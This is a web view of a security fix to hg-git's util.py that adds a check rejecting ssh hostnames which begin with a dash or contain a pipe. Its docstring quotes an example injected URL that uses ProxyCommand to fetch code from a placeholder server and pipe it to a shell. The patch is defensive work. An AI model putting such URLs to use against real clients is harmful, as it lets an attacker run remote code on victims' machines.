Mercurial > hg-git
diff hggit/util.py @ 1042:b4d2180739bb
ssh: avoid SSH command-line injection [SEC]
author | Sean Farley <sean@farley.io> |
---|---|
date | Fri, 04 Aug 2017 14:34:57 -0700 |
parents | 078c3912afce |
children | c35751c248c3 |
line wrap: on
line diff
--- a/hggit/util.py Mon Aug 07 15:40:42 2017 -0400 +++ b/hggit/util.py Fri Aug 04 14:34:57 2017 -0700 @@ -1,6 +1,7 @@ """Compatibility functions for old Mercurial versions and other utility functions.""" import re +import urllib try: from collections import OrderedDict @@ -8,7 +9,10 @@ from ordereddict import OrderedDict from dulwich import errors +from mercurial.i18n import _ from mercurial import ( + encoding, + error, lock as lockmod, util as hgutil, ) @@ -119,3 +123,18 @@ tr.close() finally: lockmod.release(tr, lock, wlock) + +def checksafessh(host): + """check if a hostname is a potentially unsafe ssh exploit (SEC) + + This is a sanity check for ssh urls. ssh will parse the first item as + an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path. + Let's prevent these potentially exploited urls entirely and warn the + user. + + Raises an error.Abort when the url is unsafe. + """ + host = urllib.unquote(host) + if host.startswith('-') or '|' in host: + raise error.Abort(_('potentially unsafe hostname: %r') % + (host,))